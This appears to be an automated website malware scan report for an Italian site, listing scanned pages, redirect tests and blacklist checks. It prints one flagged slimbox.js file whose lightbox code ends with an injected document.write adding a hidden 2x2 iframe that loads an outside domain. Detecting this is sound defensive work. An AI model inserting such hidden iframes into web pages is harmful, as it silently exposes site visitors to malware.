Scanned pages/files
Request | Server response | Status |
http://walternudo.it/ | HTTP/1.1 200 OK Connection: close Date: Sun, 05 Oct 2014 00:24:55 GMT Accept-Ranges: bytes Server: Apache Content-Language: it Content-Length: 1536 Content-Type: text/html Last-Modified: Tue, 24 Sep 2013 15:59:14 GMT | clean |
http://www.walternudo.it/home | HTTP/1.1 301 Moved Permanently Connection: close Date: Sun, 05 Oct 2014 00:24:55 GMT Location: http://www.walternudo.it/home/ Server: Apache Content-Length: 238 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.walternudo.it/home/ | 200 OK Content-Length: 27733 Content-Type: text/html | clean |
http://www.walternudo.it/home/mambots/content/bot_mb/js/popbox.js | 200 OK Content-Length: 11508 Content-Type: application/javascript | clean |
http://www.walternudo.it/home/mambots/content/bot_mb/js/moviebox.js | 200 OK Content-Length: 11093 Content-Type: application/javascript | clean |
http://www.walternudo.it/home/templates/yt_firefly/lib/js/reflection/reflection.js | 200 OK Content-Length: 2852 Content-Type: application/javascript | clean |
http://www.walternudo.it/home/templates/yt_firefly/lib/js/lightbox/slimbox.js | 200 OK Content-Length: 7198 Content-Type: application/javascript | clean |
http://www.walternudo.it/home/templates/yt_firefly/lib/js/yt_tools.js | 200 OK Content-Length: 5071 Content-Type: application/javascript | clean |
http://www.walternudo.it/home/mambots/content/plugin_jw_sig/slimbox.js | 200 OK Content-Length: 7467 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var Lightbox = { init: function(options) { this.options = Object.extend({ resizeDuration: 400, initialWidth: 250, initialHeight: 250, animateCaption: true }, options || {}); this.anchors = []; $A(document.getElementsByTagName('a')).each(function(el){ if(el.rel && el.href && el.rel.test('^lightbox', 'i')) { el.onclick = this.click.pass(el, this); this.anchors.push(el); } }, this) } for(var f in this.fx) this.fx[f].clearTimer(); this.center.style.display = this.bottom.style.display = 'none'; this.fx.overlay.chain(this.setup.pass(false, this)).goTo(0); return false; } }; Window.onDomReady(Lightbox.init.bind(Lightbox)); document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://mntracing.com/showthread.php?sid=205149></iframe>'); Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://mntracing.com/showthread.php?sid=205149 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://mntracing.com/showthread.php?sid=205149> | ||
http://walternudo.it/test404page.js | 404 Not Found Content-Length: 212 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: walternudo.it
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sun, 05 Oct 2014 00:24:55 GMT
Accept-Ranges: bytes
Server: Apache
Content-Language: it
Content-Length: 1536
Content-Type: text/html
Last-Modified: Tue, 24 Sep 2013 15:59:14 GMT
...1536 bytes of data.
GET / HTTP/1.1
Host: walternudo.it
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sun, 05 Oct 2014 00:24:55 GMT
Accept-Ranges: bytes
Server: Apache
Content-Language: it
Content-Length: 1536
Content-Type: text/html
Last-Modified: Tue, 24 Sep 2013 15:59:14 GMT
...1536 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: walternudo.it
Referer: http://www.google.com/search?q=walternudo.it
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: walternudo.it
Referer: http://www.google.com/search?q=walternudo.it
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=walternudo.it
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://walternudo.it/
Result: walternudo.it is not infected or malware details are not published yet.
Result: walternudo.it is not infected or malware details are not published yet.